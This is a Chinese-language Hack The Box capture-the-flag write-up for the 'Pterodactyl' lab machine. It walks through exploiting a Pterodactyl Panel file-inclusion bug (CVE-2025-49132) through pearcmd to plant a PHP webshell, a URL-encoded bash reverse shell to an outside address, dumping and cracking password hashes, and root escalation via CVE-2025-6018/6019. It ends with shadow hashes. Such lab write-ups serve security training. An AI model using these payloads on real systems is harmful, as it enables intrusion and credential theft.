[Season10] Pterodactyl WP

Posted on Edited on Word count in article: 1.2k Reading time ≈ 4 mins.
Hack The Box [Season10] Pterodactyl Linux Medium

Recon

Port

1
2
3
4
5
6
7
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 9.6 (protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.21.5
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.21.5
|_http-title: My Minecraft Server

Virtual host

访问 web 页面可以看到能查看 changelog,里面有配置子域名,所以这里来跑一下 vhost

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
ffuf -w ~/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://pterodactyl.htb -H "Host: FUZZ.pterodactyl.htb" -fc 302


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://pterodactyl.htb
 :: Wordlist         : FUZZ: /root/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.pterodactyl.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 302
________________________________________________

panel                   [Status: 200, Size: 1897, Words: 490, Lines: 36, Duration: 454ms]

收获一个 panel.pterodactyl.htb

Web-pterodactyl

/changelog.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
MonitorLand - CHANGELOG.txt
======================================

Version 1.20.X

[Added] Main Website Deployment
--------------------------------
- Deployed the primary landing site for MonitorLand.
- Implemented homepage, and link for Minecraft server.
- Integrated site styling and dark-mode as primary.

[Linked] Subdomain Configuration
--------------------------------
- Added DNS and reverse proxy routing for play.pterodactyl.htb.
- Configured NGINX virtual host for subdomain forwarding.

[Installed] Pterodactyl Panel v1.11.10
--------------------------------------
- Installed Pterodactyl Panel.
- Configured environment:
  - PHP with required extensions.
  - MariaDB 11.8.3 backend.

[Enhanced] PHP Capabilities
-------------------------------------
- Enabled PHP-FPM for smoother website handling on all domains.
- Enabled PHP-PEAR for PHP package management.
- Added temporary PHP debugging via phpinfo()

CVE-2025-49132 结合 PEAR 写 WebShell

漏洞原理类似于存在一个任意文件包含,而且从前面的 log 中得到 Enabled PHP-PEAR for PHP package management. 那我们可以考虑利用 pearcmd 进行命令执行

1
2
$file = resources/lang/ + $locale + '/' + $group + '.php';
require $file;

尝试使用 63square/CVE-2025-49132: PoCs for CVE-2025-49132 获取了一些信息

1
2
3
4
5
6
7
8
9
10
11
Target is vulnerable!
App key: base64{{UaThTPQnUjrrK61o}}+Luk7P9o4hM+gl4UiMJqcbTSThY=

-- Database config --
{'default': 'mysql', 'connections': {'mysql': {'driver': 'mysql', 'url': '', 'host': '127.0.0.1', 'port': '3306', 'database': 'panel', 'username': 'pterodactyl', 'password': 'PteraPanel', 'unix_socket': '', 'charset': 'utf8mb4', 'collation': 'utf8mb4_unicode_ci', 'prefix': '', 'prefix_indexes': '1', 'strict': '', 'timezone': '+00{{00}}', 'sslmode': 'prefer', 'options': {'1014': '1'}}}, 'migrations': 'migrations', 'redis': {'client': 'predis', 'options': {'cluster': 'redis', 'prefix': 'pterodactyl_database_'}, 'default': {'scheme': 'tcp', 'path': '/run/redis/redis.sock', 'host': '127.0.0.1', 'username': '', 'password': '', 'port': '6379', 'database': '0', 'context': []}, 'sessions': {'scheme': 'tcp', 'path': '/run/redis/redis.sock', 'host': '127.0.0.1', 'username': '', 'password': '', 'port': '6379', 'database': '1', 'context': []}}}

-- Filesystem config --
{'default': 'local', 'disks': {'local': {'driver': 'local', 'root': '/var/www/pterodactyl/storage/app', 'throw': ''}, 'public': {'driver': 'local', 'root': '/var/www/pterodactyl/storage/app/public', 'url': 'http://panel.pterodactyl.htb/storage', 'visibility': 'public', 'throw': ''}, 's3': {'driver': 's3', 'key': '', 'secret': '', 'region': '', 'bucket': '', 'url': '', 'endpoint': '', 'use_path_style_endpoint': '', 'throw': ''}}, 'links': {'/var/www/pterodactyl/public/storage': '/var/www/pterodactyl/storage/app/public'}}

-- Mail config --
{'default': 'smtp', 'mailers': {'smtp': {'transport': 'smtp', 'host': 'smtp.example.com', 'port': '25', 'encryption': 'tls', 'username': '', 'password': '', 'timeout': '', 'local_domain': 'panel.pterodactyl.htb'}, 'ses': {'transport': 'ses'}, 'mailgun': {'transport': 'mailgun'}, 'postmark': {'transport': 'postmark'}, 'sendmail': {'transport': 'sendmail', 'path': '/usr/sbin/sendmail -bs -i'}, 'log': {'transport': 'log', 'channel': ''}, 'array': {'transport': 'array'}, 'failover': {'transport': 'failover', 'mailers': ['smtp', 'log']}}, 'from': {'address': 'no-reply@example.com', 'name': 'Pterodactyl Panel'}, 'markdown': {'theme': 'default', 'paths': ['/var/www/pterodactyl/resources/views/vendor/mail']}}

让 AI 生成字典 FUZZ 以后,得到 pearcmd.php 位于 /usr/share/php/PEAR 目录下

写个 webshell 然后反弹 shell

1
2
3
/locales/locale.json?+config-create+/&locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&/<?=system($_GET['cmd']);?>+/tmp/payload.php 

/locales/locale.json?&locale=../../../../../../tmp&namespace=payload&cmd=bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F10%2E10%2E16%2E62%2F6666%200%3E%261

拿到 user.txt

1
2
cat /home/phileasfogg3/user.txt
bdf11038c28774f26e024601d0333772

查看一下数据库中有没有账号信息,先枚举表名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
mysql -u pterodactyl -p'PteraPanel' -h 127.0.0.1 -D panel -e "SHOW TABLES;"

mysql: Deprecated program name. It will be removed in a future release, use '/usr/bin/mariadb' instead
Tables_in_panel
activity_log_subjects
activity_logs
allocations
api_keys
api_logs
audit_logs
backups
database_hosts
databases
egg_mount
egg_variables
eggs
failed_jobs
jobs
locations
migrations
mount_node
mount_server
mounts
nests
nodes
notifications
password_resets
recovery_tokens
schedules
server_transfers
server_variables
servers
sessions
settings
subusers
tasks
tasks_log
user_ssh_keys
users

查看 users 数据库

1
2
3
4
5
6
mysql -u pterodactyl -p'PteraPanel' -h 127.0.0.1 -D panel -e "SELECT * FROM users;"

mysql: Deprecated program name. It will be removed in a future release, use '/usr/bin/mariadb' instead
id      external_id     uuid    username        email   name_first      name_last       password      remember_token   language        root_admin      use_totp        totp_secret     totp_authenticated_at gravatar created_at      updated_at
2       NULL    5e6d956e-7be9-41ec-8016-45e434de8420    headmonitor     headmonitor@pterodactyl.htb   Head     Monitor $2y$10$3WJht3/5GOQmOXdljPbAJet2C6tHP4QoORy1PSj59qJrU0gdX5gD2    OL0dNy1nehBYdx9gQ5CT3SxDUQtDNrs02VnNesGOObatMGzKvTJAaO0B1zNU   en      1       0       NULL    NULL    1       2025-09-16 17:15:41    2025-09-16 17:15:41
3       NULL    ac7ba5c2-6fd8-4600-aeb6-f15a3906982b    phileasfogg3    phileasfogg3@pterodactyl.htb  Phileas  Fogg    $2y$10$PwO0TBZA8hLB6nuSsxRqoOuXuGi3I4AVVN2IgE7mZJLzky1vGC9Pi    6XGbHcVLLV9fyVwNkqoMHDqTQ2kQlnSvKimHtUDEFvo4SjurzlqoroUgXdn8   en      0       0       NULL    NULL    1       2025-09-16 19:44:19    2025-11-07 18:28:50

使用 john 对得到的 hash 进行爆破

1
john hash.txt --wordlist=/usr/share/wordlists/rockyou.tx

得到 phileasfogg3:!QAZ2wsx,我们尝试进行 ssh 登录

拿到 user flag

1
2
phileasfogg3@pterodactyl:~> cat user.txt
bdf11038c28774f26e024601d0333772

提权

CVE-2025-6018 & CVE-2025-6019

有注意到还存在一些其他服务的端口

1
2
3
4
5
6
7
8
9
10
11
╔══════════╣ Active Ports
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports
══╣ Active Ports (ss)
tcp   LISTEN 0      512        127.0.0.1:631       0.0.0.0:*          
tcp   LISTEN 0      512        127.0.0.1:9000      0.0.0.0:*          
tcp   LISTEN 0      128          0.0.0.0:22        0.0.0.0:*          
tcp   LISTEN 0      100        127.0.0.1:25        0.0.0.0:*          
tcp   LISTEN 0      512          0.0.0.0:80        0.0.0.0:*          
tcp   LISTEN 0      511        127.0.0.1:6379      0.0.0.0:*          
tcp   LISTEN 0      80         127.0.0.1:3306      0.0.0.0:*          
tcp   LISTEN 0      128             [::]:22           [::]:*

631CUPS 2.2.7,不受 rce nday 的影响

查看系统可得受到 CVE-2025-6018/CVE-2025-6019 的影响

1
2
3
4
5
6
7
8
9
10
11
12
13
phileasfogg3@pterodactyl:~> cat /etc/os-release
NAME="openSUSE Leap"
VERSION="15.6"
ID="opensuse-leap"
ID_LIKE="suse opensuse"
VERSION_ID="15.6"
PRETTY_NAME="openSUSE Leap 15.6"
ANSI_COLOR="0;32"
CPE_NAME="cpe:/o:opensuse:leap:15.6"
BUG_REPORT_URL="https://bugs.opensuse.org"
HOME_URL="https://www.opensuse.org/"
DOCUMENTATION_URL="https://en.opensuse.org/Portal:Leap"
LOGO="distributor-logo-Leap"

CVE-2025-6018,登录上后修改

1
2
3
4
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF

在本地制作一个恶意 XFS 文件系统镜像,利用 guinea-offensive-security/CVE-2025-6019 提权

1
2
3
4
bash-5.1# id
uid=1002(phileasfogg3) gid=100(users) euid=0(root) groups=100(users)
bash-5.1# cat /root/root.txt
743457eefd923f2e830a5029cd76b011

Hash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root:$6$iOhjvxjnk.Sgt97C$Fr4NzyL9SEFOiH653sh30DAR1kmR9jxGNeWMplTMQmlXVO/CfRXy7q2xopOBkfG2SG/I3O7KDOFHT7bOTZG.a0:20343::::::
messagebus:!:20343::::::
nobody:!:20343::::::
man:!:20343::::::
mail:!:20343::::::
lp:!:20343::::::
daemon:!:20343::::::
bin:!:20343::::::
chrony:!:20343::::::
postfix:!:20343::::::
systemd-timesync:!*:20343::::::
nscd:!:20343::::::
polkitd:!:20343::::::
rpc:!:20343::::::
statd:!:20343::::::
sshd:!:20343::::::
wwwrun:!:20347::::::
mysql:!:20347::::::
redis:!:20347::::::
nginx:!:20347::::::
dockremap:!:20347::::::
pterodactyl:!:20399::::::
headmonitor:!:20399:0:99999:7:::
phileasfogg3:$6$Zc6vsfIsXPSjCLgU$1CEcVIqk717ztdSj0VJ3CaCxSsGYV8N2DgJsJGXeDKoYoBmc8l2F5LbvWFfRYuyBn0Xf5t1Tx4i9Ao8xsSnXQ.:20399:0:99999:7:::
_laurel:!:20453::::::